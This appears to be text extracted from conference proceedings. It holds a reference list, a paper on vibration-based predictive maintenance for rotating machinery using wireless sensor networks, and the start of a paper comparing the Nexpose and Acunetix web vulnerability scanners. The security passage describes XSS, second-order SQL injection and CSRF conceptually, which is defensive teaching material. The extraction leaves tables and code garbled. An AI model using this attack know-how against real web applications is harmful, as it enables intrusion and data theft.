´ Waehrens, B.V., Slepniov, D.: Accessing offshoring 49. Mykhaylenko, A., Motika, A., advantages: what and how to offshore. Strateg. Outsourcing Int. J. (2015) 50. Naraharisetti, P.K., Karimi, I., Srinivasan, R.: Supply chain redesign through optimal asset management and capital budgeting. Comput. Chem. Eng. 32(12), 3153– 3169 (2008) 51. OCDE: Perspectives des technologies de l’information de l’OCDE. Technical report, US (2004) 52. OECD: OECD guidelines on corporate governance of state-owned enterprises. Corporate Governance, p. 55 (2005). https://doi.org/10.1787/9789264116078-en 53. Perron, S., Hansen, P., Le Digabel, S., Mladenovi´c, N.: Exact and heuristic solutions of the global supply chain problem with transfer pricing. Eur. J. Oper. Res. 202(3), 864–879 (2010) 54. Persaud, A., Floyd, J.: Offshoring and outsourcing of R and D and business activities in Canadian technology firms. J. Technol. Manage. Innov. 8(3), 1–12 (2013) 55. Pickles, J., Smith, A.: Delocalization and persistence in the European clothing industry: the reconfiguration of trade and production networks. Reg. Stud. 45(2), 167–185 (2011) 56. PricewaterhouseCoopersLLP: International transfer pricing 2015/16, p. 1200 (2016). https://doi.org/10.1561/1400000037, www.pwc.com/internationaltp 57. Shunko, M., Debo, L., Gavirneni, S.: Transfer pricing and sourcing strategies for multinational firms. Prod. Oper. Manage. 23(12), 2043–2057 (2014). https://doi. org/10.1111/poms.12175 58. Shunko, M., Gavirneni, S.: Role of transfer prices in global supply chains with random demands. J. Indus. Manage. Optim. 3(1), 99 (2007) 59. Slepniov, D., Brazinskas, S., Wæhrens, B.V.: Nearshoring practices: an exploratory study of Scandinavian manufacturers and Lithuanian vendor firms. Baltic J. Manage. (2013) 60. Sundarakani, B., Pereira, V., Ishizaka, A.: Robust facility location decisions for resilient sustainable supply chain performance in the face of disruptions. Int. J. Logistics Manage. (2020) 61. van der Vorst, J.G., Tromp, S.O., van der Zee, D.J.: Simulation modelling for food supply chain redesign; integrated decision making on product quality, sustainability and logistics. Int. J. Prod. Res. 47(23), 6611–6631 (2009) 62. Verter, V., Dasci, A.: The plant location and flexible technology acquisition problem. Eur. J. Oper. Res. 136(2), 366–382 (2002) 63. Vidal, C.J., Goetschalckx, M.: A global supply chain model with transfer pricing and transportation cost allocation (April 2016) (2001). https://doi.org/10.1016/ S0377-2217(99)00431-2 64. Vila, D., Martel, A., Beauregard, R.: Designing logistics networks in divergent process industries: a methodology and its application to the lumber industry. Int. J. Prod. Econ. 102, 358–378 (2006) 65. Wilhelm, W., Liang, D., Rao, B., Warrier, D., Zhu, X., Bulusu, S.: Design of international assembly systems and their supply chains under NAFTA. Transp. Res. Part E Logistics Transp. Rev. 41(6), 467–493 (2005) 66. Yan, H., Yu, Z., Cheng, T.C.: A strategic model for supply chain design with logical constraints: formulation and solution. Comput. Oper. Res. 30(14), 2135– 2155 (2003). https://doi.org/10.1016/S0305-0548(02)00127-2 67. Zambujal-Oliveira, J.: A real options analysis of foreign direct investment competition in a news uncertain environment. Int. J. Econ. Manage. Eng. 5(5), 480–485 (2011)

92

M. Benfssahi et al.

68. Zhang, A., Luo, H., Huang, G.Q.: A bi-objective model for supply chain design of dispersed manufacturing in China. Int. J. Prod. Econ. 146(1), 48–58 (2013) 69. Zhu, S., Pickles, J.: Bring in, go up, go west, go out: upgrading, regionalisation and delocalisation in China’s apparel production networks. J. Contemp. Asia 44(1), 36–63 (2014)

A Predictive Maintenance System Based on Vibration Analysis for Rotating Machinery Using Wireless Sensor Network (WSN) Imane El Boughardini(B) , Meriem Hayani Mechkouri, and Kamal Reklaoui Engineering, Innovation Management and Industrial Systems Research Laboratory, FSTT University Abdelmalek ESSAADI, Tangier, Morocco [email protected], {mhayanimechkouri, kreklaoui}@uae.ac.ma

Abstract. Over the years, more and more industries are focused on digitizing their manufacturing operations by using a bunch of advanced technologies like Machine Learning and Artificial Intelligence based on different equipments and materials, such as sensors, cameras, and lidar. All of them could be combined to wireless technology communication and create an IoT network. In this context, the objective is to present our contribution in the field of failure prediction in Rotation machinery based on diagnosis and prognosis system for predictive maintenance. With the help of the new intelligent diagnostic indicators, it is possible to target default points in real time before taking actions using the stream processing. Machine analysis behavior is a traditional approach used in maintenance field to capture damage and failure. It is also a perfect tool for detecting and then diagnosing operating default in rotating machines. The present work is about predicting the situation using a new Wireless sensor Network in rotating machinery by capturing and treating all the collected data and testing them with Machine Learning algorithm. Keywords: Predictive Maintenance · Wireless Sensors Network · Rotating Machinery · Vibration analysis

1 Introduction At the beginning of the 19th century, the world witnessed the emergence of one industrial revolution after another. Each of them powered by revolutionary new technologies: steam engine mechanics, assembly line principles d computers speed. They called industrial revolutions because the innovations that sparked them not only increased productivity and efficiency, but also revolutionized the entire manufacturing sector. Today we are experiencing the fourth industrial revolution, which takes supply chain automation, monitoring and analytics to a new level through smart technologies. At the heart of Industry 4.0 are the Industrial Internet of Things (IIoT), cyber-physical systems (CPS), information and communications technology (ICT), intelligent autonomous systems that use computer algorithms to monitor and control physical things, including equipment, robots and vehicles. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 93–106, 2023. https://doi.org/10.1007/978-3-031-35251-5_9

94

I. E. Boughardini et al.

The Cyber-Physical Systems (CPS) is defined as transformative technologies for managing interconnected systems between its physical assets and computational capabilities that can interact with humans through many new modalities [1]. It characterized by advanced connectivity that allows real-time data acquisition from physical objects and information feedback from the cyber space and intelligent data management, analytics and computational capability that constructs the cyber space [2]. All these functionalities are important to make the Digital Smart Factory real as long as Industry 4.0 is based on the massive use of data and greatly increased connectivity. Based on several works, there are nine main pillars of the Fourth Industrial Revolution; they outline the new technology manufacturers are using to improve all areas of production processes. These technologies include Industrial Internet of Things (IIoT), Big Data and Analytics, Horizontal and vertical system integration, Simulation, Cloud computing, Augmented Reality (AR) [3]. This industrial revolution promises many potential benefits for companies: Improved plant efficiency, reduced running costs, automation of the production process…and it has given rise to a new strategy of proactive maintenance based on prediction. This way we will get greater efficiency in maintenance through data analysis in predictive maintenance. The following text has four sections. Section 2 summarizes the related work and why the necessity of our study. Section 3 presents the schema proposed and followed by a discussion, ending with our conclusion & perspectives in the last Section.

2 Predictive Maintenance for Rotating Machinery Rotating machinery is one of the most common classes of machines [4]. The reason for a large number of unplanned breakdowns is equipment turnover. So far, these items are serviced after a certain period or not serviced at all. Thus, maintenance is carried out too early or, in some cases, too late, leading to production stoppages. Continuous monitoring allows us to identify signs of faults and set the stage for predictive maintenance. In this way, the threat of failure can be anticipated or maintenance can be carried out in a timely manner. In addition, information on the status of equipment components is available at all times. 2.1 Concept and Functioning of the Predictive Maintenance (PdM) Predictive maintenance (PdM) is gaining in importance in multidisciplinary research groups [5]. It is one of the most practical and advanced applications for managing maintenance in smart factories. Therefore, it is part of Industry 4.0. A proactive maintenance strategy uses condition-monitoring tools to detect various signs of equipment degradation, anomalies and performance issues. The PdM aims to minimize maintenance costs, implement zero waste production and reduce the number of major breakdowns [6]. The main advantage of predictive maintenance is being able to schedule work based on the current condition of the asset. The predictive maintenance collects the data so that it can be analyzed and used for the

A Predictive Maintenance System Based on Vibration Analysis

95

purpose for which it is intended. Based on Internet of Things technology, conditionmonitoring sensors that can collect and share data to connect assets to a central system that stores incoming information to predict the remaining useful life of an asset. 2.2 Predictive Maintenance Technologies To avoid production stoppages, it is necessary to constantly monitor this equipment and track down all the warning signs of defects right on time. There are several condition monitoring techniques that can be used to effectively predict failures and provide advanced warnings. Based on several works, there is a wide range of parameters that can be monitored for predictive maintenance, some of the most important being [7]: Vibration analysis, Acoustic analysis, Lubrication oils analysis, Particle analysis in the working environment, Corrosive analysis, Thermal analysis, Performance analysis. Vibration Analysis. Moving parts of rotating machinery can produce disruptive vibrations that eventually cause breakdowns. There are various diagnostic techniques that use vibration measurements as indicators, through which it is possible to determine the root cause of the deterioration of the machine. Based on several researches, they have proven that the most reliable parameter which gives the best way the state of deterioration of a rotating machine is the vibration [8]. Is used to monitor the health of rotating machinery in operation and aims to detect any malfunctions and to follow their evolution in order to plan a mechanical intervention [9].

2.3 Predictive Maintenance - Process (CBM-PHM) Predictive maintenance takes into account machine components health to predict the future breakdown. Therefore, the development of an efficient predictive maintenance approach requires an integration of the detection, the diagnosis and the prognosis in the process by allowing intelligent diagnosis rotating machines health based on vibration analysis to detect and monitor the degradation. Then, prediction of remaining operating time could be possible and unplanned downtime avoided (Fig. 1).

Fig. 1. Predictive Maintenance process [10, 11].

96

I. E. Boughardini et al.

Condition-Based Maintenance (CBM). Is a maintenance program that recommends maintenance actions based on the information collected through condition monitoring [12]. It includes data acquisition, data processing, fault detection and diagnostics. Prognostic Health Management (PHM). Is a health management approach using measurements, models, and software to accomplish early fault detection, condition assessment, and failure progression prediction [13]. It includes prognosis, estimation of RUL and the decision-making process for the implementation of predictive maintenance and the associated logistics.

3 Detection, Diagnosis, and Prognosis for Rotating Machinery 3.1 Detecting Faults of Rotating Machines There are several methods for detecting faults in rotating machines (the envelope method, the wavelet transform, the singular value decomposition). The Envelope Method (Example of a bearing fault detection case) The envelope method is a technique using the high frequency resonance of the bearing (or sensor). To do this, it uses the resonance frequency of the bearing to extract the information needed to determine the presence of the defect and highlights this information in a frequency range normally observed in vibration analysis (0–1500 Hz). More precisely, the envelope method uses the modulation of the amplitude of the resonant frequency of the bearing, by the frequency of the defect. In practice, the envelope method requires a series of processing of the raw temporal signal before obtaining the result (Fig. 2).

3.2 Commonly Witnessed Machinery Faults Diagnosed by Vibration Analysis The task of condition monitoring and fault diagnosis of rotating machinery faults is both significant and important but is often cumbersome and labour intensive [14]. Although, it is possible if, beforehand, one knows the vibration symptoms associated with each defect susceptible to the affect that is to say if we know the vibratory images induced by these defects. Some of the machinery faults detected using vibration analysis are listed below (Table 1).

A Predictive Maintenance System Based on Vibration Analysis

97

Fig. 2. Envelope Method Operation Diagram.

3.3 Vibration Signal Analysis and Measurement Time Domain Vibration Analysis. A vibration is characterized mainly by frequency, amplitude and its nature. Three detection modes are commonly used in vibration measurement: The Peak-to-Peak Value. Indicates the difference between the maximum and minimum amplitudes of the movement. The Peak Value. Defines the ratio of the peak value of a signal to its effective value. The RMS Value. Is the most interesting measure of vibration amplitudes. In addition to taking into account the evolution of the signal over time, the calculation of the effective value is linked to the vibrational energy and therefore to the “potential for deterioration” of the vibration.

98

I. E. Boughardini et al. Table 1. Main defects of rotating machines detected by vibration analysis. Type of fault

Fault description

Unbalance

The uneven distribution of mass around the axis of rotation of a rotor. Vibration due to unbalance of a rotor is probably the most common machinery defect. It generally comes from defects in machining, assembly and mounting. We can distinguish 3 types of unbalance: Static imbalance, Couple imbalance, Dynamic imbalance.

Misalignment

Misalignment occurs when the shaft centerlines of two directly mating components meet at angles and/or are offset from one another. It is one of the main causes of reduced equipment life. It concerns either two shafts linked by a coupling, or two bearings supporting the same axis.

Bent shaft

Bends in shafts may be developed in several ways, such as due to creep, thermal distortion or a large unbalance force. It generates excessive vibration in a machine, depending on amount and location of the bend.

Gears defects

Gear faults typically occur in the teeth of a gear mechanism due to fatigue, spalling, or pitting. These can be manifested as cracks in the gear root or removal of metal from the tooth surface. They can be caused by wear, excessive loads, poor lubrication, backlash, and occasionally improper installation or manufacturing defects.

Bearing defects

Bearings are among the most stressed components of machinery and are a frequent source of failure. The defects that can be encountered are the following: flaking, seizing, corrosion (which leads to flaking), etc.

Loosening

Mechanical looseness occurs when rotating components have been fitted incorrectly. It can occur at three locations: Internal assembly looseness, Looseness at machine to base plate interface, Structure looseness.

Vibration analysis starts with a time-varying, real-world signal from a transducer or sensor. Analyzing vibration data in the time domain (amplitude plotted against time) is limited to a few parameters in quantifying the strength of a vibration profile: amplitude, peak-to-peak value, and RMS (Table 2).

RMS:

Root mean square amplitude

x (t): instantaneous amplitude

p: The

peak amplitude

T: signal analysis time

A Predictive Maintenance System Based on Vibration Analysis

99

Table 2. Calculation of Root Mean Square Amplitude. Case of a sinusoidal vibration ARMS =



Ap 2 = 0.707Ap 2

Case of other vibrations   ARMS = T1 T0 x2 (t)

Various factors are essential in RMS analysis of vibrations: o o o o

Vibration Sensors Signal Conditioning Data acquisition system along with its configuration Vibration measurement set-up

The RMS value is used because it is directly related to the energy content of the vibration profile and therefore to the destructive capacity of the vibration. RMS also takes into account the time history of the waveform. Frequency Domain Vibration Analysis. The classical frequency analysis can be obtained from the Fourier transform of the temporal signal. Several special analysis techniques can give us a good idea about the overall health and condition of the bearings. The fast Fourier transform is a computational tool that facilitates signal analysis [15]. Knowledge of Frequency Indicators helps locate and identify the kind of faults in rotating machinery. Inspecting measured data in the frequency domain is often the primary part of analyzing and monitoring signals. Data from a variety of sensors are used in order to solve problems, monitor machinery, and predict machine health monitoring, Bearing fault detection for rotating machinery… When performing rotating machinery diagnostics, certain frequency components relate to specific mechanical parts within the machine. FFT analysis allows inspecting how the devices react at individual frequencies during vibration testing of components and devices. This means that frequency spectra can help with design optimizations, as well as with specifying deflection limitations. FFT can also be used to determine acceptable tolerance curves over the measured frequency range, and to alarm users when critical vibration levels are exceeded at specific frequencies (Fig. 3). Application on Some Faults of Rotating Machines. The following table represents a comparison between the initial state and the evolved state for some faults of rotating machines (Table 3). Vibration Limits Proposed by the AFNOR E90-300 Standard. The vibration parameter used for the classification of machines is the Effective Amplitude of the Vibration Velocity in mm/s RMS in the band [10; 1000] Hz (Table 4).

100

I. E. Boughardini et al.

Fig. 3. A time signal with sinusoidal components and it representation in the frequency domain.

Table 3. Initial and Evolved State Initial state

Evolved state

Unbalance

Edging

3.4 The Accelerometer Sensor The main objective of signal analysis involved in a structural vibration test is obtaining information on amplitudes, frequencies, and phase differences of the measured accelerations [16]. In the implementation of vibration analysis monitoring, accelerometers are the best option because they are simple, easy to apply and very sensitive to the high frequency vibrations generally generated in the event of mechanical failure [17]. An accelerometer is a device that measures the vibration or acceleration of motion of a structure. The force caused by vibration or a change in motion (acceleration) causes the mass to “squeeze” the piezoelectric material, which produces an electrical charge

A Predictive Maintenance System Based on Vibration Analysis

101

Table 4. Permissible Vibration Levels on Rotating Machines. Machine size classification Permissible vibration levels (mm/s RMS)

Small (less than 15 kw)

Medium (between 15 kw-75 kw)

Large (greater than 75 kw)

State

Amplitude of the Vibration Velocity in mm/s RMS in the band [10; 1000] Hz

0,28 0,45 0,71 1,12 1,80 2,80 4,50 7,10 11,20 18,00 28,00 45,00

A

A

A

B B B

C C

C D

D

D

proportional to the force exerted on it. It consists of a piezoelectric element prestressed by a seismic mass. The vibration varies the pre-stress (in compression or shear) and deforms the piezoelectric element, which then generates an electrical signal (Fig. 4).

Fig. 4. Piezoelectric accelerometer

3.5 Classification of Diagnostic Methods The AFNOR standard [18] defines the diagnosis as being the identification of the probable cause of the failure(s) using logical reasoning based on a set of information from an inspection, check, or test. Diagnostic methods can be summarized in (Fig. 5):

102

I. E. Boughardini et al. Diagnostic methods Internal methods: knowledge of operation in the form of mathematical models Diagnostic methods by physical modeling Analytical redundancy

External methods: no model is available to describe cause and effect relationships

Inductive and deductive methods

Diagnostic methods by external signature analysis

Diagnostic methods by functional modeling

Pattern recognition

Fault tree

Identifying Parameters

FMEA

State vector estimation

Fig. 5. Classification of diagnostic methods [19]

4 Wireless Sensor Network (WSN) Wireless Sensor Network (WSN) is a distributed sensor network composed a large number of nodes with low cost, low performance and self-management [20]. It is now possible to solve the monitoring and control tasks that are critical for the operating time of the sensors. The main area of application is the control and monitoring of measured parameters of physical environments and objects: it is used to monitor physical or environmental conditions, such as temperature, sound, vibration, pressure, motion and to cooperatively pass their data through the network to a main location or sink where the data can be observed and analyzed. We can summarize the network architecture in WSN in these three layers: Application Layer. The role of the application layer is to abstract the physical topology of the WSN for applications. Moreover, the application layer provides necessary interfaces for data visualization items through Graphic User Interface (GUI), by presenting the data treated in different forms such as plots and chart plots. Transport Layer. Transport layer protocols are responsible for end-to-end transmission of data packets; it includes provisions for reliable or unreliable data delivery. Also, represent the link between the application and the sensor layer for capturing the data generated from different sensors on-board machines by using an IoT platform and such communication bandwidth with low latency and high transferring rate. Sensor Layer. Represent the base layer in our WSN architecture which is responsible for sensing data from connected machines and devices, by using an advanced M2M communication standard protocol like Open Platform communication Unified Architecture (OPC UA) that to help the data exchange between users and servers more accurately.

A Predictive Maintenance System Based on Vibration Analysis

103

These protocols are widely used in automation industries for establishing M2M communication by using the concept called an aggregating server, where the multiple servers are pinned to a solitary server [21]. In addition, this data gathered are categorized by its complexity for pre-processing and processing that require a data cleaning before transmitting the data.

5 Results and Discussions In this paper, we propose a Fault Diagnosis System for Predictive Maintenance by Vibration Analysis of Rotating Machinery scheme based on Wireless Sensor Network. In our scheme (Fig. 6), we presented three layers, the first layer (sensor layer) consists of a set of smart sensors (vibration sensors), which detect data from connected machines and devices and communicate with each other. As we explained in the previous axis, the transport layer represent the link between the application and the sensor layer for capturing the data generated from different sensors on-board machines by using an IoT and it transmits information to the application layer using the base stations. The application layer contains several components starting from Data Center, which is considered as an infrastructure made up of a network of computers and storage spaces, it aims to organize, process, and store our massive Data. Passing to the Database servers that are used to store and manage databases that are stored on the server and to provide data access for authorized users [22]. Since we are talking about Big Data, then we need a technology that can help us perform a rapid analysis of our data. That why we added in our scheme the OLAP database (Online Analytical Processing). It is a computer processing technology. Which will allow us to easily consult and extract the data to compare them in different ways. It means we converted the online Data from raw to clean (Eliminating redundant data…etc.) then compare them with the expected values of our system parameters, we talking here about fault detection, we continue to monitor our system in a continuous way we apply the Fast Fourier Transform to obtain frequency domain data until we notice an unusual behavior. Because the changes in vibration signals due to fault can be detected by employing signal-processing methods. It can be used to evaluate the health status of the machinery. The nature and severity of the problem can be determined by analyzing the vibration signal and hence the failure can be predicted. The diagnosis aims to identify the probable cause of the failure. All these devices share a common communications line or wireless link to a server within a distinct geographic area via a monitoring center LAN (Local Area Network).

104

I. E. Boughardini et al.

Fig. 6. The proposed Fault Diagnosis System for Predictive Maintenance based on Wireless Sensor Network

6 Conclusion and Perspectives Predictive maintenance consists of anticipating future failures on equipment, on object, on a system; the name comes from the fact that it uses artificial intelligence techniques and big data used in industry 4.0. The predictive maintenance process start from data acquisition (via smart sensors), data processing or signal processing that divided into time, frequency, and time domain frequency analysis. The time domain analysis involves the statistical features of peak, root-mean-square (RMS)… and the frequency domain

A Predictive Maintenance System Based on Vibration Analysis

105

analysis consists of fast Fourier transform (FFT)…. A Fault Diagnosis System for Predictive Maintenance by Vibration Analysis was prosed using a Wireless sensor networks architecture that are used to monitor physical or environmental conditions. However, unfortunately there is some disadvantages of the Wireless sensor networks that should improve: o Since it is wireless in nature, the risk of being hacked is always present. o It cannot be used for high-speed communication because it is designed for low speed applications. o The construction of such a network is expensive and therefore cannot be affordable for everyone. The future will see the next generation maintenance strategy that can be achieved using the Internet of things (IoT) and deep learning. Smart wireless sensors will be installed, which will be able to train themselves from the vibration data and undertake the required learning about the health condition [23]. The sensor will able to determine the RUL of the machinery, and based on the same, the sensor will able to take a decision on whether to keep the machine running or stop it for breakdown maintenance. Acknowledgments. This work was supported by the Ministry of Higher Education, Scientific Research and Innovation, the Digital Development Agency (DDA) and the CNRST of Morocco APIAA-2019-KAMAL.REKLAOUI-FSTT-Tanger-UAE.

References 1. Baheti, R., Gill, H.: Cyber-physical systems. Impact Control Technol. 12(1), 161–166 (2011) 2. Lee, J., Bagheri, B., Kao, H.A.: A cyber-physical systems architecture for Industry 4.0-based manufacturing systems. Manuf. Lett. 3, 18–23 (2015). https://doi.org/10.1016/j.mfglet.2014. 12.001 3. Silvestri, L., Forcina, A., Introna, V., Santolamazza, A., Cesarotti, V.: Maintenance transformation through Industry 4.0 technologies: a systematic literature review. Comput. Ind. 123, 103335 (2020). https://doi.org/10.1016/j.compind.2020.103335 4. Heng, A., Zhang, S., Tan, A.C.C., Mathew, J.: Rotating machinery prognostics: state of the art, challenges and opportunities. Mech. Syst. Signal Process. 23(3), 724–739 (2009). https:// doi.org/10.1016/j.ymssp.2008.06.009 5. Zonta, T., da Costa, C.A., da Rosa Righi, R., de Lima, M.J., da Trindade, E.S., Li, G.P.: Predictive maintenance in the Industry 4.0: a systematic literature review. Comput. Ind. Eng. 150, 106889 (2020). https://doi.org/10.1016/j.cie.2020.106889 6. Pech, M., Vrchota, J., Bednáˇr, J.: Predictive maintenance and intelligent sensors in smart factory: review. Sensors 21(4), 1470 (2021). https://doi.org/10.3390/s21041470 7. Coand˘a, P., Avram, M., Constantin, V.: A state of the art of predictive maintenance techniques. IOP Conf. Ser. Mater. Sci. Eng. 997(1), 012039 (2020). https://doi.org/10.1088/1757-899X/ 997/1/012039 8. Abdelhak, E.H., Kaddour, R., Abbes, E.M., Mohamed, B.: Maintenance predictive et preventive basee sur l’analyse vibratoire des rotors, p. 19

106

I. E. Boughardini et al.

9. Chiementin, M.X., Rasolofondraibe, M.L.: Contribution au processus de surveillance intelligente des machines tournantes : cas des roulements à billes. Thèse dirigée par XAVIER CHIEMENTIN ET LANTO RASOLOFONDRAIBE, p. 137 10. Jouin, M., Gouriveau, R., Hissel, D., Pera, M.C., Zerhouni, N.: PHM of proton-exchange membrane fuel cells - a review. Chem. Eng. Trans. 33, 1009–1014 (2013). https://doi.org/10. 3303/CET1333169 11. Zwingelstein, G.: La maintenance prédictive intelligente pour l’industrie 4.0., Maintenance (2019). https://doi.org/10.51257/a-v1-mt9572 12. Jardine, A.K.S., Lin, D., Banjevic, D.: A review on machinery diagnostics and prognostics implementing condition-based maintenance. Mech. Syst. Signal Process. 20(7), 1483–1510 (2006). https://doi.org/10.1016/j.ymssp.2005.09.012 13. Kalgren, P., Byington, C., Roemer, M., Watson, M.: Defining PHM, a lexical evolution of maintenance and logistics. In: 2006 IEEE Autotestcon, Anaheim, CA, USA, September 2006, pp. 353–358. https://doi.org/10.1109/AUTEST.2006.283685 14. Yang, H.: Intelligent diagnosis of rotating machinery faults - a review, p. 8 15. Cochran, T., et al.: What is the fast fourier transform? Proc. IEEE 55(10), 1664–1674 (1967) 16. Han, S.: Measuring displacement signal with an accelerometer. J. Mech. Sci. Technol. 24(6), 1329–1335 (2010). https://doi.org/10.1007/s12206-010-0336-1 17. Mailly, F., Giani, A., Martinez, A., Bonnot, R., Temple-Boyer, P., Boyer, A.: Micromachined thermal accelerometer. Sens. Actuators Phys. 103(3), 359–363 (2003). https://doi.org/10. 1016/S0924-4247(02)00428-4 18. AFNOR, Techniques for analysing the reliability of systems - procedures for analysing failure modes and their effects (AMDE), Standard NF x 60 510, 1986.pdf 19. Zwingelstein G.: Diagnostic des défaillances- théorie et pratique pour les systèmes industriels, Traité des Nouvelles technologies, série Diagnostic et Maintenance, Hermès, Paris, 1995.pdf 20. Chen, Y., Yang, X., Li, T., Ren, Y., Long, Y.: A blockchain-empowered authentication scheme for worm detection in wireless sensor network. Digit. Commun. Netw., S2352864822000566 (2022). https://doi.org/10.1016/j.dcan.2022.04.007 21. Muniraj, S.P., Xu, X.: An implementation of OPC UA for machine-to-machine communications in a smart factory. Procedia Manuf. 53, 52–58 (2021). https://doi.org/10.1016/j.promfg. 2021.06.009 22. Grasdal, M., Hunter, L.E., Cross, M., Hunter, L., Shinder, D.L., Shinder, T.W.: MCSE 70-293: planning server roles and server security. In: MCSE (Exam 70-293) Study Guide, pp. 53–146. Elsevier (2003). https://doi.org/10.1016/B978-193183693-7/50006-3 23. Kumar, A., Gandhi, C.P., Zhou, Y., Kumar, R., Xiang, J.: Latest developments in gear defect diagnosis and prognosis: a review. Measurement 158, 107735 (2020). https://doi.org/10.1016/ j.measurement.2020.107735

A Comparative Study of Vulnerabilities Scanners for Web Applications: Nexpose vs Acunetix Bochra Labiad(B) , Mariam Tanana, Abdelaziz Laaychi, and Abdelouahid Lyhyaoui Laboratory of Innovative Technologies (LTI), National School of Applied Sciences of Tangier, Abdelmalek Essaadi University, Tetouan, Morocco {bochra.labiad,abdelaziz.laaychi}@etu.uae.ac.ma, {mtanana,a.lyhyaoui}@uae.ac.ma

Abstract. As known, everyone uses web applications to make purchases, transfer funds, upload data, etc. Meanwhile, the security of these web applications has become a significant challenge due to various vulnerabilities in web applications such as XSS, SQL injection (Second order), and many others. For this aim, we have penetration tests, that plays a very important role to detect those vulnerabilities, and it is called a simulated network attack, in which professional ethical hackers break into the company’s network to find vulnerabilities using tools that have been proven to uncover different types of vulnerabilities in a very short time. In recent years, cybersecurity has experienced a different kind of vulnerability detection based on AI, more specifically machine learning. This challenge has led cyber defense engineers to create different modules to handle this. In this article, we will do a comparison between two penetration testing tools while scanning the same target and discovering 3 ranking vulnerabilities and see some approaches. Keywords: Web applications test

1

· Vulnerabilities · Exploits · Penetration

Introduction

Strong web sites security is critical to the success of an online business. The importance of security has greatly increased, especially in web applications. Solving problems related to websites or website security requires careful planning and knowledge, not only because of the many tools available but also because of the immaturity of the industry [1]. Nowadays, with the ubiquity of web applications, the demand for web application development is growing rapidly. The advantage of web development is that young developers with interesting ideas can work together to develop web applications. Therefore, vulnerabilities are caused by the ignorance of web developers or built-in errors of the platform used. Inexperienced web developers who are c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 107–117, 2023. https://doi.org/10.1007/978-3-031-35251-5_10

108

B. Labiad et al.

not fully aware of secure code practices design applications with high-security risks. These applications, if started without adequate security testing, become attractive targets for attackers. Anyone who uses such vulnerable applications becomes the hacker’s prey, and the privacy and confidential information are at risk [2]. Web application vulnerabilities can also refer to vulnerabilities in participating business logic, which are usually unresolved in a secure environment. An important stage in the software development life cycle involves an important part of web application security, this is the vulnerability assessment/penetration testing phase of the web application. In fact, This step mainly uses methods, one is the manual web application software vulnerability assessment, and the other is the automatic software vulnerability assessment method. During the vulnerability phase of a web application, these tools can help identify general vulnerabilities that have passed through the development phase [3]. Web sites vulnerabilities and exploits continue to evolve. All standards that are acceptable today may become obsolete tomorrow, leading to new exploits. Therefore, in this review and future work, we will discuss three ranking vulnerabilities and two strong vulnerability scanners, and we will make a comparison between these two exploits. In conclusion, we suggest that in the next work, we will see how machine learning could help and developed to discover those 3 ranking vulnerabilities.

2

Description of XSS, SQL Injection (Second Order) and CSRF

The popularity of the World Wide Web has made websites and their visitors’ attractive targets for various types of cybercrime, including data breaches, targeted phishing campaigns, ransomware, and false technical support fraud. They happen every day, and more than 76% of websites contain insecure security vulnerabilities [4], that is why penetration testing is recently getting developed based on the amount of vulnerabilities and breaches happening every minute. Penetration testing involves many different things, some of which include Wi-Fi, networks, software, and hardware. Most systems and websites have weaknesses present when launched. These vulnerabilities are called zero-day vulnerabilities. Those vulnerabilities are either known by the companies as not that bad to be fixed or know nothing about them. There are many interoperability issues between software and hardware. These issues may remain unknown for many years before being discovered, and some have never been discovered because the issue did not occur [5]. As we all know, applications and the OS that support them are very complex software. When the software is released, different users can use it in different ways. This can lead to unexpected errors that an attacker can manipulate to gain access. Therefore, it is very important to understand the vulnerabilities of systems and applications, and this knowledge is essential to prevent or mitigate malicious attacks [6]. There are many known web application vulnerabilities such as XSS, SQL injection (Second order), and CSRF. We will introduce them in the following sections.

A Comparative Study of Vulnerabilities Scanners for Web Applications

2.1

109

Cross Site Scripting (XSS)

XSS vulnerabilities can be exploited directly or indirectly. The sensitive information that hackers steal by exploiting XSS vulnerabilities is not limited to cookie data [3]. In other respects, Cross-Site Scripting (XSS) is an applicationlevel code injection vulnerability. This always happens when a server program (dynamic website) uses unlimited entries in its response via an HTTP request, database, or file without authentication. Attackers are used to stealing sensitive information (such as cookies, and sessions) and perform other malicious actions [7]. XSS is usually divided into three types: – Reflected Cross Site Scripting – Stored/Persistent Cross-Site Scripting – DOM Based Cross Site Scripting Figure 1 shows the following sequence of steps to execute a stored XSS attack. First, the attacker uses the comment form on the blog site to insert a malicious script and store it in the site’s database. Then, legitimate users send HTTP requests to the site to view the latest comments. The site returns the saved comment and its script in its response. Finally, the legitimate user’s browser runs the script and sends the legitimate user’s confidential information to the attacker’s server [7].

Fig. 1. Sequence Diagram to Represent XSS Attack Scenario.

110

2.2

B. Labiad et al.

SQL Injection (Second-Order)

The majority of daily transactions are done online through web applications, e.g. online shopping, online banking, reservations, etc. All the user and transaction data that is provided on these sites is retrieved and stored in the database. But the database in which this information is stored is highly vulnerable to SQL injection attacks. An SQL injection attack consists of the attacker inserting malicious SQL statements that could give him access to the database or the information stored in it, or harm the web application or the privacy of the users of the web application [8].The payload of the first-order SQL injection attack load is directly passed to the SQL query, but the SQL (second-order) injection attack process is divided into two stages, that is, the payload memory attack stage and the stage layout for the database or system file. SQL query statements with load attacks from a database or file system, like the general function of user registration and modification of user information in the web application, can perform a second-order SQL injection attack. The user registration function loads the payload of the attack into the database data, and afterward, the function of modifying user information extracts the attack payload from the database to build a SQL database query that causes a second-order SQL injection. The key codes for the user registration function are as below [9]: $link=new mysqli(“localhost”, “root”, “root”); $query=“INSERT INTO Users VALUES(‘?’,‘?’,‘?’)”; $cmd=1ink− > prepare(query); $cmd= bind param(“sss”,usemame,password,email); $cmd= execute; 2.3

CSRF (Giant-Cross Site Request Forgery)

Cross-site request forgery (CSRF) is also known as “session control” and “oneclick attack”. When malicious websites, web forums, or emails cause the target web browser to run abnormally on trusted web pages [10]. The Cross-Site Request Forgery (CSRF) vulnerability is possible because the attacker could take any of the actions the user could take, for example creating users/entries, change/delete data of the client, which can help the server to differentiate between a legitimate and an illegitimate request [11]. These vulnerabilities are some of the most prominent cited by OWASP1 in the past two years, and penetration testing vulnerabilities are being developed to mitigate and fix these types of vulnerabilities and improve the security of web applications. So, the scanning process first pastes the URL into the crawler’s URL input field, which mentions the application to be scanned for vulnerabilities. The application scanner usually consists of three main components, which will successfully complete the scanning process, including [12]:

1

The Open Web Application Security Project.

A Comparative Study of Vulnerabilities Scanners for Web Applications

111

